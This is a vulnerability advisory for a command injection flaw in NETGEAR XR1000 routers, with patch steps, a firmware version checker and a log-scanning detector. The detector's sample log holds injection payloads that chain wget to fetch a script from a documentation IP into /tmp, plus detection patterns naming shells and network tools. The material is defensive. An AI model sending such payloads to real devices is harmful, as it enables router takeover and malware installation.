CVE-2021-45513

9.6 CRITICAL

📋 TL;DR

This vulnerability allows unauthenticated attackers to execute arbitrary commands on NETGEAR XR1000 routers. Attackers can gain full control of affected devices by injecting malicious commands through network requests. All users with XR1000 routers running vulnerable firmware are affected.

💻 Affected Systems

Products:
  • NETGEAR XR1000
Versions: All versions before 1.0.0.58
Operating Systems: NETGEAR proprietary firmware
Default Config Vulnerable: ⚠️ Yes
Notes: All default configurations are vulnerable. No special configuration required for exploitation.

📦 What is this software?

The NETGEAR XR1000 is a Nighthawk Pro Gaming WiFi 6 router. It runs NETGEAR's firmware with the DumaOS management interface and, like other NETGEAR consumer routers, is administered through a web UI on the LAN side.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise allowing attackers to install persistent malware, intercept all network traffic, pivot to internal networks, or use the device as part of a botnet.

🟠 Likely Case

Attackers gain remote shell access to modify router settings, steal credentials, or deploy cryptocurrency miners.

🟢 If Mitigated

If properly patched, no impact. With the management interface segmented from untrusted networks, exposure is limited to the router itself.

🌐 Internet-Facing: HIGH - Routers are typically internet-facing and the exploit requires no authentication.
🏢 Internal Only: MEDIUM - Could be exploited from internal networks if attacker gains initial access.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit requires sending specially crafted HTTP requests to vulnerable endpoints. No authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.0.58 or later

Vendor Advisory: https://kb.netgear.com/000064149/Security-Advisory-for-Command-Injection-on-XR1000-PSV-2021-0010

Restart Required: Yes

Instructions:

1. Log into the router admin interface.
2. Navigate to Advanced > Administration > Firmware Update.
3. Check for updates and install version 1.0.0.58 or later.
4. Reboot the router after the update completes.

🔧 Temporary Workarounds

Network Segmentation (all versions): Isolate the router management interface from untrusted networks.

Access Control Lists (all versions): Restrict access to the router management interface to trusted IPs only.

🧯 If You Can't Patch

  • Disable remote management and WAN-side administration
  • Place router behind firewall with strict inbound rules

🔍 How to Verify

Check if Vulnerable:

Check firmware version in router admin interface under Advanced > Administration > Firmware Update

Check Version:

curl -s http://router_ip/currentsetting.htm | grep -i '^Firmware='

currentsetting.htm is served without authentication and reports the version on a line of the form Firmware=V1.0.0.xx_... (there is no firmware_version key). Replace router_ip with the LAN address of the router.

Verify Fix Applied:

Confirm firmware version is 1.0.0.58 or later in admin interface
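The version check described above, as an added example that is not NETGEAR's code: it parses the unauthenticated currentsetting.htm page, which NETGEAR routers expose as Key=Value lines including Firmware=V<version> and Model=<model>, and compares the version with the 1.0.0.58 fix. The sample body below is constructed, and router_ip on the command line is a placeholder for the LAN address of the device.

```python
"""Check an XR1000 for CVE-2021-45513 by firmware version.

Added example, not from NETGEAR. Assumes the router serves the usual
unauthenticated /currentsetting.htm page made of Key=Value lines such as
'Firmware=V1.0.0.57_1.0.15' and 'Model=XR1000'. Offline, it runs against
the constructed SAMPLE body below; pass a router IP as argv[1] to query a
real device.
"""
from __future__ import annotations

import re
import sys
import urllib.request

AFFECTED_MODEL = "XR1000"
FIXED_VERSION = (1, 0, 0, 58)          # first firmware that contains the fix

# Constructed currentsetting.htm body (not captured from a real device).
SAMPLE = """Firmware=V1.0.0.57_1.0.15
RegionTag=XR1000_NA
Region=us
Model=XR1000
InternetConnectionStatus=Up
"""

VERSION_RE = re.compile(r"^Firmware=V?(\d+(?:\.\d+)+)", re.MULTILINE)
MODEL_RE = re.compile(r"^Model=(\S+)", re.MULTILINE)


def parse_version(body: str) -> tuple[int, ...] | None:
    """Return the numeric firmware version, e.g. (1, 0, 0, 57), or None."""
    m = VERSION_RE.search(body)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def parse_model(body: str) -> str | None:
    m = MODEL_RE.search(body)
    return m.group(1) if m else None


def is_vulnerable(version: tuple[int, ...]) -> bool:
    """True when version < 1.0.0.58. Components beyond the fourth are ignored;
    missing ones count as 0, so '1.0.0' compares as 1.0.0.0."""
    head = list(version[:4]) + [0] * (4 - len(version[:4]))
    return tuple(head) < FIXED_VERSION


def assess(body: str) -> dict:
    """Classify a currentsetting.htm body: vulnerable / patched / other_model / unknown."""
    model, version = parse_model(body), parse_version(body)
    if model is None or version is None:
        status = "unknown"                # page present but Model= or Firmware= missing
    elif model != AFFECTED_MODEL:
        status = "other_model"            # CVE-2021-45513 is scoped to the XR1000
    elif is_vulnerable(version):
        status = "vulnerable"
    else:
        status = "patched"
    return {"model": model, "version": version, "status": status}


def fetch_currentsetting(router_ip: str, timeout: float = 5.0) -> str:
    """Retrieve the page over plain HTTP from the LAN side; no login needed."""
    url = f"http://{router_ip}/currentsetting.htm"
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return r.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    body = fetch_currentsetting(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    result = assess(body)
    ver = ".".join(map(str, result["version"])) if result["version"] else "?"
    print(f"model={result['model']} firmware={ver} status={result['status']}")
```

The model check matters: the same page layout is served by other NETGEAR models, and a low version number on a different model says nothing about this CVE.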

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs
  • Multiple failed login attempts followed by successful command execution
  • Suspicious HTTP requests to router management endpoints

Network Indicators:

  • Unusual outbound connections from router
  • HTTP requests with command injection patterns to router IP
  • Traffic to known malicious IPs from router

SIEM Query:

source="router_logs" AND ("cmd=" OR "exec=" OR "system(") AND dest_ip="router_ip"
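The HTTP-request indicators above, applied to sample log lines, as an added example that is not part of the advisory: the scanner URL-decodes each request target (repeatedly, so double encoding does not hide a payload) and flags shell separators, command substitution, download tools and /tmp paths. The log lines are constructed in Apache combined format; /example_endpoint.cgi and its host parameter are placeholders, not the real vulnerable endpoint.

```python
"""Scan router HTTP access logs for command-injection attempts against
management endpoints.

Added example, not from NETGEAR or the advisory. The log lines below are
constructed in Apache combined format; the endpoint name
/example_endpoint.cgi and the parameter 'host' are placeholders, not the
real vulnerable endpoint. Detection works on the URL-decoded request
target, so single- and double-encoded payloads are both caught.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed sample: two benign requests, one classic ';wget' injection,
# one double-encoded '$(id)' command substitution.
LOG_SAMPLE = """\
192.0.2.10 - - [10/Jan/2022:10:00:01 +0000] "GET /currentsetting.htm HTTP/1.1" 200 512 "-" "curl/7.79.1"
192.0.2.10 - - [10/Jan/2022:10:00:04 +0000] "GET /index.htm?lang=en&page=status HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2022:10:00:09 +0000] "POST /example_endpoint.cgi?host=127.0.0.1%3Bwget%20http%3A%2F%2F203.0.113.5%2Fx.sh%20-O%20%2Ftmp%2Fx HTTP/1.1" 200 128 "-" "python-requests/2.26"
198.51.100.7 - - [10/Jan/2022:10:00:12 +0000] "GET /example_endpoint.cgi?host=%2524%2528id%2529 HTTP/1.1" 200 64 "-" "python-requests/2.26"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristics for shell injection in a request target. A bare '&' is a normal
# query separator and is deliberately not an indicator; '&&' is.
INDICATORS = {
    "shell_separator": re.compile(r"[;|`]|&&|\n|\r"),
    "command_substitution": re.compile(r"\$\(|\$\{"),
    "download_tool": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "shell_or_listener": re.compile(r"\b(?:sh|bash|busybox|telnetd|nc|netcat)\b|/bin/"),
    "tmp_path": re.compile(r"/tmp/|/var/tmp/"),
}


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %2524 -> %24 -> '$' is seen as '$'."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


def indicators_for(target: str) -> list[str]:
    """Names of the indicators that match the decoded request target."""
    decoded = fully_decode(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan(lines) -> list[dict]:
    """Return one record per request that trips at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log entry; skip
        found = indicators_for(m["target"])
        if found:
            hits.append({
                "src": m["src"], "ts": m["ts"], "method": m["method"],
                "target": m["target"], "decoded": fully_decode(m["target"]),
                "indicators": found,
            })
    return hits


if __name__ == "__main__":
    for h in scan(LOG_SAMPLE.splitlines()):
        print(f"{h['ts']} {h['src']} {h['method']} {h['decoded']}  <- {', '.join(h['indicators'])}")
```

The word-boundary patterns (sh, nc, curl) will occasionally fire on legitimate parameter values; treat a single indicator as a lead and a separator plus a download tool or /tmp path from the same source as a strong signal, and tune the lists to the traffic your router actually sees.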
